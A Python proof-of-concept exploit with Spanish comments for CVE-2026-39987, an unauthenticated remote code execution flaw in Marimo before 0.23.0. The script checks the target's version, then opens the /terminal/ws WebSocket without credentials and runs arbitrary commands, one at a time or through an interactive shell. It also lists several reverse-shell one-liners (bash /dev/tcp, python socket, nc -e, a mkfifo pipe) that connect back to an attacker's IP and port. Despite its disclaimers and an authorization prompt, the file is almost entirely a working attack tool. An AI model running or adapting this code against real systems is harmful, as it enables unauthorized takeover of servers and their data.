#!/usr/bin/env python3 """ CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket) PoC de explotación - Conecta a /terminal/ws sin autenticación ⚠️ ADVERTENCIA: Este script es SOLO para fines educativos y pruebas autorizadas. El uso no autorizado es ILEGAL. El autor no se hace responsable. Author: Security Researcher Date: 2026-04-13 Severity: CRITICAL CVSS: 9.3 Uso: python CVE-2026-39987_PoC.py Ejemplo: python CVE-2026-39987_PoC.py http://localhost:8080 "id" """ import asyncio import websockets import json import sys import argparse import requests from urllib.parse import urlparse, urljoin import ssl import warnings warnings.filterwarnings("ignore") # Colores para output class Colors: RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' BLUE = '\033[94m' PURPLE = '\033[95m' CYAN = '\033[96m' WHITE = '\033[97m' BOLD = '\033[1m' END = '\033[0m' def print_banner(): banner = f""" {Colors.RED}{Colors.BOLD} ╔══════════════════════════════════════════════════════════════════╗ ║ CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket) ║ ║ Critical | CVSS: 9.3 | Remote Code Execution ║ ╚══════════════════════════════════════════════════════════════════╝ {Colors.END} """ print(banner) def check_target(target_url): """Verifica si el objetivo es vulnerable (detección pasiva)""" print(f"{Colors.CYAN}[*] Verificando objetivo...{Colors.END}") # Normalizar URL if not target_url.startswith(('http://', 'https://')): target_url = 'http://' + target_url target_url = target_url.rstrip('/') # Verificar favicon try: r = requests.get( urljoin(target_url, "favicon.ico"), timeout=8, verify=False ) if r.status_code == 200: print(f"{Colors.GREEN}[+] Favicon encontrado{Colors.END}") else: print(f"{Colors.YELLOW}[!] Favicon no encontrado (aún puede ser vulnerable){Colors.END}") except: print(f"{Colors.YELLOW}[!] No se pudo verificar favicon{Colors.END}") # Verificar versión try: r = requests.get( urljoin(target_url, "api/version"), timeout=8, verify=False ) if r.status_code == 200: import re match = re.search(r'(0\.[0-9]+\.[0-9]+)', r.text) if match: version = match.group(1) print(f"{Colors.GREEN}[+] Versión detectada: {version}{Colors.END}") from packaging.version import Version if Version(version) < Version("0.23.0"): print(f"{Colors.RED}[!] Versión VULNERABLE (< 0.23.0){Colors.END}") else: print(f"{Colors.GREEN}[✓] Versión SEGURA (>= 0.23.0){Colors.END}") return False else: print(f"{Colors.YELLOW}[!] No se pudo extraer versión{Colors.END}") else: print(f"{Colors.YELLOW}[!] Endpoint /api/version no disponible{Colors.END}") except: print(f"{Colors.YELLOW}[!] No se pudo verificar versión{Colors.END}") return True # Asumir vulnerable si no se puede verificar async def exploit_websocket(target_url, command, interactive=False): """ Explota el WebSocket de Marimo Args: target_url: URL del objetivo (http://...) command: Comando a ejecutar interactive: Modo interactivo (shell persistente) """ # Convertir HTTP a WS parsed = urlparse(target_url) if parsed.scheme == 'https': ws_scheme = 'wss' ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE else: ws_scheme = 'ws' ssl_context = None ws_url = f"{ws_scheme}://{parsed.netloc}/terminal/ws" print(f"{Colors.CYAN}[*] Conectando a: {ws_url}{Colors.END}") try: # Conectar al WebSocket if ssl_context: async with websockets.connect(ws_url, ssl=ssl_context) as websocket: return await handle_connection(websocket, command, interactive, target_url) else: async with websockets.connect(ws_url) as websocket: return await handle_connection(websocket, command, interactive, target_url) except websockets.exceptions.InvalidStatusCode as e: print(f"{Colors.RED}[-] Error de conexión: Código {e.status_code}{Colors.END}") return False except ConnectionRefusedError: print(f"{Colors.RED}[-] Conexión rechazada. ¿El servicio está corriendo?{Colors.END}") return False except Exception as e: print(f"{Colors.RED}[-] Error: {str(e)}{Colors.END}") return False async def handle_connection(websocket, command, interactive, target_url): """Maneja la conexión WebSocket""" try: # Recibir mensaje de bienvenida welcome = await asyncio.wait_for(websocket.recv(), timeout=5) print(f"{Colors.GREEN}[+] WebSocket conectado exitosamente{Colors.END}") print(f"{Colors.CYAN}[*] Bienvenida: {welcome[:100]}{Colors.END}") if interactive: print(f"\n{Colors.GREEN}{Colors.BOLD}[+] Shell interactiva obtenida!{Colors.END}") print(f"{Colors.YELLOW}[!] Escribe 'exit' para salir{Colors.END}") print(f"{Colors.YELLOW}[!] Comandos disponibles: cualquiera del sistema{Colors.END}\n") while True: # Pedir comando al usuario cmd = input(f"{Colors.GREEN}marimo-shell>{Colors.END} ").strip() if cmd.lower() in ['exit', 'quit']: print(f"{Colors.CYAN}[*] Cerrando conexión...{Colors.END}") break if not cmd: continue # Enviar comando payload = json.dumps({ "type": "exec", "command": cmd }) await websocket.send(payload) # Recibir resultado try: result = await asyncio.wait_for(websocket.recv(), timeout=10) print(result) print() # Línea en blanco except asyncio.TimeoutError: print(f"{Colors.RED}[-] Timeout - No se recibió respuesta{Colors.END}\n") else: # Modo comando único print(f"{Colors.CYAN}[*] Ejecutando comando: {command}{Colors.END}") # Enviar comando payload = json.dumps({ "type": "exec", "command": command }) await websocket.send(payload) # Recibir resultado try: result = await asyncio.wait_for(websocket.recv(), timeout=15) print(f"\n{Colors.GREEN}[+] Resultado:{Colors.END}") print(f"{Colors.WHITE}{'='*60}{Colors.END}") print(result) print(f"{Colors.WHITE}{'='*60}{Colors.END}") return True except asyncio.TimeoutError: print(f"{Colors.RED}[-] Timeout - No se recibió respuesta{Colors.END}") return False except asyncio.TimeoutError: print(f"{Colors.RED}[-] Timeout esperando bienvenida{Colors.END}") return False except Exception as e: print(f"{Colors.RED}[-] Error en la comunicación: {str(e)}{Colors.END}") return False def reverse_shell_payload(ip, port): """Genera payloads para reverse shell""" payloads = [ f"bash -i >& /dev/tcp/{ip}/{port} 0>&1", f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'", f"nc -e /bin/sh {ip} {port}", f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f" ] return payloads[0] # Devolver bash reverse shell def main(): parser = argparse.ArgumentParser( description='CVE-2026-39987 - Marimo Pre-Auth RCE PoC', epilog='Ejemplos:\n python CVE-2026-39987_PoC.py http://target.com:8080 "id"\n python CVE-2026-39987_PoC.py http://target.com:8080 -i\n python CVE-2026-39987_PoC.py http://target.com:8080 --revshell 10.0.0.1 4444', formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument('target', help='URL del objetivo (ej: http://localhost:8080)') parser.add_argument('command', nargs='?', help='Comando a ejecutar (opcional si se usa -i)') parser.add_argument('-i', '--interactive', action='store_true', help='Modo interactivo (shell persistente)') parser.add_argument('--revshell', nargs=2, metavar=('IP', 'PORT'), help='Generar reverse shell (IP y puerto)') parser.add_argument('--no-check', action='store_true', help='Saltar verificación de vulnerabilidad') args = parser.parse_args() # Mostrar banner print_banner() # ADVERTENCIA print(f"{Colors.RED}{Colors.BOLD}[!] ADVERTENCIA: Este script es solo para pruebas autorizadas{Colors.END}") print(f"{Colors.RED}[!] El uso no autorizado es ILEGAL{Colors.END}\n") response = input(f"{Colors.YELLOW}¿Tienes autorización para probar este objetivo? (yes/no): {Colors.END}") if response.lower() != 'yes': print(f"{Colors.RED}[-] Saliendo...{Colors.END}") sys.exit(0) # Verificar objetivo if not args.no_check: if not check_target(args.target): print(f"{Colors.RED}[-] El objetivo parece estar parchado. Saliendo...{Colors.END}") sys.exit(1) else: print(f"{Colors.YELLOW}[!] Saltando verificación de vulnerabilidad{Colors.END}") # Procesar reverse shell si se solicita if args.revshell: ip, port = args.revshell command = reverse_shell_payload(ip, port) print(f"{Colors.CYAN}[*] Reverse shell configurada: {ip}:{port}{Colors.END}") print(f"{Colors.YELLOW}[!] Asegúrate de tener netcat escuchando: nc -lvnp {port}{Colors.END}") args.interactive = False elif args.interactive: command = None elif not args.command: parser.print_help() sys.exit(1) else: command = args.command # Ejecutar exploit print(f"\n{Colors.CYAN}[*] Iniciando explotación...{Colors.END}") try: asyncio.run(exploit_websocket(args.target, command, args.interactive)) except KeyboardInterrupt: print(f"\n{Colors.YELLOW}[!] Interrumpido por el usuario{Colors.END}") sys.exit(0) if __name__ == "__main__": # Verificar dependencias try: import websockets import packaging.version except ImportError: print(f"{Colors.RED}[-] Dependencias faltantes. Instala con:{Colors.END}") print(f"{Colors.CYAN}pip install websockets packaging requests{Colors.END}") sys.exit(1) main()